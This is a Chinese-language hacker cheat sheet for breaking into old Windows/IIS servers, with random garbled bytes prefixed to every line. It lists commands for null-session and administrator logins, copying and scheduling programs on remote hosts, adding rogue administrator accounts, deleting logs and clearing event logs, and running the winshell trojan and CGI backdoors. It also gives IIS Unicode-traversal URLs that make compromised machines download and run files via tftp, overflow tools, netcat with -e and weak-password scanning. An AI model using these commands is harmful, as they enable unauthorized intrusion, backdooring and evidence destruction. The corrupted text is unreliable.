网管和黑客都必须知道的命令
R4P$zB_<�2 常用的几条NET命令:
�e�lzKt�Vw 2�-!n+#Cdf (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�2�B='��'W <rA�k"�R^ (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
qs'gg�F1�� b"QeCw#v`> (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
6�A \Z221E 5|�Or,8r(C (查看远程主机时间) net time \\IP地址
�/'g�"Ys?3 _mSQ>�BBRl (定时启动某个程序) at \\IP地址 02:18 readme.exe
z~+gche>� �Y\1XKAfB� (查看共享) net view \\IP地址
X*�Dt<i};v GtNGrJU��� (查看netbios工作组列表) nbtstat -A IP地址
?�B`Yq\�L) }2�-p=�Y:6 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
*�U�l��L\� ��VG+WV��k (这两条把自己增加到管理员组): net user 用户名 密码 /add
�>W[#-jA_Z ;UB�$�Uqs6 net localgroup Administrators 用户名 /add
}4M4��D/�= �j*05!j<'� (断开连接) net use \\IP地址\ipc$ /delete
8�NS1*�\�z v�'zj<�|�2 扫尾:
`GD�>3- � KB^i=+x�r del C:\winnt\system32\logfiles\*.*
� �|#�D$9+ f�W'U��7&O del C:\winnt\ssytem32\config\*.evt
999E0A$dkv z�L��H�E; del C:\winnt\system32\dtclog\*.*
G �B�&+EZ� ��"t\gkJyK del C:\winnt\system32\*.log
�rt7]�~W�- d�3|�oK�P6 del C:\winnt\system32\*.txt
r=3k�nCEWK �@�JL+xf�z del C:\winnt\*.txt
Q4JvF��y0' (`&�`vf�� del C:\winnt\*.log
O��o�r�&1 =��z$XqT.' 一、netsvc.exe
Qy+&�N*k�> z�z+p6`� � 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
�;Pi-H,1b �h&4f9HhS= netsvc /list \\IP地址
-�n�`�igC� �fQB>0RR�2 netsvc schedule \\IP地址 /query
g@�jA�Iy]� �L9=D�,C~
netsvc \\IP地址 schedule /start
Ydr�/ T�/1 xE4iey@\�} 二、OpenTelnet.exe
*4tJ|m6"Y6 ~yvOR`2Gg 远程启动主机的Telnet服务,并绑定端口到7878,例如:
pw�vcH3l/r '~� {x���n OpenTelnet \\IP地址 用户名 密码 1 7878
�Lz9t9A�oB Q< q&a��8~ 然后就可以telnet到主机的7878端口,进入DOS方式下:
�2"~QI xY= �oT�\�u^WU telnet IP地址 7878
-b4#/q+bb+ u{o!#_o6�4 三、winshell.exe
S^Z�[w�|�1 �0`�
{6~p 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�F9Ag6�87w .#]�
V5g, p Path (查看winshell主程序的路径信息)
R""P01IZ�H V~uH)IMkh7 b reBoot (重新启动机器)
]$>�O�--�� i:�ZL0nH-� d shutDown (关闭机器)
xD��(JkOne �SOI��$M�x s Shell (执行后你就会看到可爱的“C:\>”)
~�Zc=F�P:1 9p#Laei]. x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�lo*)�%�fy
�1px8�af] CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
K�n��C;j-j /�@�<Pn&Rq 四、3389登陆器,GUI方式登录远程主机的
{i7�Wp$�ug L�.�u���X� 五、elsave.exe
By�rK|lVM0 O��RV~F0d< 事件日志清除工具
SJtQK-%wK> |@x�^5Ab$T elsave -s \\IP地址 -l "application" -C
0
7Cufo��I �|�-HV�@c] elsave -s \\IP地址 -l "system" -C
�hwaU;�>�F $E��B&]t�+ elsave -s \\IP地址 -l "security" -C
Dg$Z5`%k�8 .
_�5g<aw; 执行后成功清除应用程序日志,系统日志,安全日志
V^P]QQ\�
) )�@xHL]!5m 六、hbulot.exe
� G�It~"�X "Z&-:1tP{9 开启win2kserver和winxp的3389服务
#S��/]��=D L��*���Mt/ hbulot [/r]
>Q$, } `U; 4E`y*Hmzy+ 使用/r表示安装完成后自动重起目标使设置生效。
3Ms�`
a�jJ I]"wT2@T;7 七、nc.exe(netcat.exe)
s:y~vd�(Vi KV�Vo_9S' 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
(3DjF�T3
w �Lb��k�a*@ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
I���6���x ��HWJ(�O/N 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
Fq6sl}b(On G6�C#�M-S� 参数:
@O/Jy2�>3H 5U&b")3IT! -e prog 程序重定向,一旦连接,就执行 [危险!!]
oh
k.;��� !1tHg� Z2\ -g gateway source-routing hop point[s], up to 8
�}7���>r, fb7���G�y� -G num source-routing pointer: 4, 8, 12, ...
0U�E�EvD�5 v)*/E'Cr*� -h 帮助信息
v+��Nd�O$o T[}A7a�6g_ -i secs 延时的间隔
�X|�}y�p|� /STFXR1@.u -l 监听模式,用于入站连接
b]'Uv8f�bF �Fb&Xy{kt1 -n 指定数字的IP地址,不能用hostname
N02X*�N�C 0j^���QY6 -o file 记录16进制的传输
�:�Yi�1�#� ^�tS{a�*Yn -p port 本地端口号
Z*EK�56.b� ��I�%]~]a� -r 任意指定本地及远程端口
jN\} l|;q� �}pJ�6�CW� -s addr 本地源地址
3�BuG�_ild )[�d�?&�GK -u UDP模式
2lVJ�"j�g� /;7\HZ$�@/ -v 详细输出——用两个-v可得到更详细的内容
'D� ,e�fTq d
NQ?8P-& -w secs timeout的时间
'�O��I�Ol� S�+^*r�w�� -z 将输入输出关掉——用于扫描时
<l/�Q��S3M 八、TFTPD32.EXE
�(yj�x+K_[ &�b�[��.bf 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
xV&c�)�l>} \K�$�9r=!( http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
sN`2"�t�/s ��g.wp
}fz 然后可以直接令文件运行:
S�V�2DvrIR J<g�$�h�k� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
;��JM�%O8� q�\2�q3}n� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
dW���K;
�h J#h2�~Hz!� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�= GN1�l[X �3/�rEXK�S 一、一 Xscan命令行运行参数说明:
xbbQ)sH&m� y0!�-].5UH 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
d5zv8?|�X+ �sn�P�M&� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
xq����`mo OF��[y$<jM xscan -file <主机列表文件名> <检测项目> [其他选项]
MK�qMH,O� T5*
t~`bfU 其中<检测项目> 含义如下:
!��S�0$W?* �K4����\{G -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
rI/�;�L<c� ~#z8�Q{!�O -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
4+rr3� $AY bXVH��7F�y -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
/.54r/FN') Z����Y_aE -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
F �E�`4%X� v�2OK/W,�0 -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
V}?*kx~T2C �+m|S7�yr' [其他选项] 含义如下:
-�~ w5��yd 8+HXG�qcv -v: 显示详细扫描进度
�HPz9E��r �7R4�s��d� -p: 跳过Ping不通的主机
}e/#dME�i� �%N� �jRD| -o: 跳过没有检测到开放端口的主机
(O�A-Mg�yc F�8u�;C:^d -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
